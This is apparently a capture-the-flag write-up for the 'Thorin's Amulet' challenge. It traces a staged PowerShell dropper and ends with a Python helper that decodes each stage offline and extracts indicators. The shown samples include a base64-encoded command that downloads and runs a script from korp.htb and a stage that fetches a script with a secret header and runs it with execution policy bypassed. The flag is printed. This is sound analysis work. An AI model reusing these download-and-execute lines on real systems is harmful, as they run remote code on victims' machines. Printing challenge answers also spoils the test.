Thorin's Amulet

Personal Rating: Very Easy

function qt4PO {
    if ($env:COMPUTERNAME -ne "WORKSTATION-DM-0043") {
        exit
    }
    powershell.exe -NoProfile -NonInteractive -EncodedCommand "SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8va29ycC5odGIvdXBkYXRlIik="
}
qt4PO

# Command: IEX (New-Object Net.WebClient).DownloadString("http://korp.htb/update")

I fetched the "update" file and inspected it. It makes a web request with a custom HTTP header to fetch another script and then executes it with the execution policy bypassed.

function aqFVaq {
    Invoke-WebRequest -Uri "http://korp.htb/a541a" -Headers @{"X-ST4G3R-KEY"="5337d322906ff18afedc1edc191d325d"} -Method GET -OutFile a541a.ps1
    powershell.exe -exec Bypass -File "a541a.ps1"
}
aqFVaq

Given the custom header, the script "a541a.ps1" can be obtained with curl by sending that header (I had to add the domain to my hosts file beforehand):

curl 'http://korp.htb/a541a' -H 'X-ST4G3R-KEY: 5337d322906ff18afedc1edc191d325d' -o a541a.ps1

This is the script a541a.ps1:

$a35 = "4854427b37683052314e5f4834355f346c573459355f3833336e5f344e5f39723334375f314e56336e3730727d"
# Split the hex string into two-character pairs, convert each pair to a char and join them
($a35 -split "(..)" | ?{$_} | %{[char][convert]::ToInt16($_,16)}) -join ""

Hex-decoding the string in $a35 in CyberChef returned the flag:

HTB{7h0R1N_H45_4lW4Y5_833n_4N_9r347_1NV3n70r}
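The whole chain can be unpacked offline without running any stage. The following Python script is an added example and not part of the original writeup: the three stage strings are copied from the scripts above, and the decoding and IOC-extraction functions are mine. Note that PowerShell's -EncodedCommand normally expects UTF-16LE base64, while this sample's blob is plain ASCII, so the decoder checks which encoding it is looking at.

```python
import base64
import re

# The three stages as recovered in the writeup (copied from the page, not fetched live).
STAGE1 = ('powershell.exe -NoProfile -NonInteractive -EncodedCommand '
          '"SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8va29ycC5odGIvdXBkYXRlIik="')
STAGE2 = ('Invoke-WebRequest -Uri "http://korp.htb/a541a" '
          '-Headers @{"X-ST4G3R-KEY"="5337d322906ff18afedc1edc191d325d"} -Method GET -OutFile a541a.ps1')
STAGE3 = ('$a35 = "4854427b37683052314e5f4834355f346c573459355f3833336e5f344e5f'
          '39723334375f314e56336e3730727d"')


def decode_encoded_command(cmdline):
    """Decode the base64 following -EncodedCommand / -enc / -e.

    PowerShell expects UTF-16LE here; this sample is plain ASCII base64, so the
    UTF-16LE path is taken only when every high byte of the decoded data is zero."""
    m = re.search(r'-e(?:nc(?:odedcommand)?)?\s+"?([A-Za-z0-9+/=]+)', cmdline, re.I)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def extract_iocs(script):
    """Return (urls, custom X-* headers) found in a PowerShell stage, for blocking and hunting."""
    urls = re.findall(r'https?://[^\s"\')]+', script)
    headers = dict(re.findall(r'"(X-[^"]+)"\s*=\s*"([^"]+)"', script))
    return urls, headers


def decode_hex_string(script):
    """Recover the text hidden in the hex literal (what the $a35 one-liner does at runtime)."""
    m = re.search(r'"([0-9a-fA-F]+)"', script)
    return bytes.fromhex(m.group(1)).decode("ascii") if m else None


if __name__ == "__main__":
    stage1_cmd = decode_encoded_command(STAGE1)
    print("stage 1 ->", stage1_cmd)
    for stage in (stage1_cmd, STAGE2):
        print("IOCs:", extract_iocs(stage))
    print("stage 3 ->", decode_hex_string(STAGE3))
```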
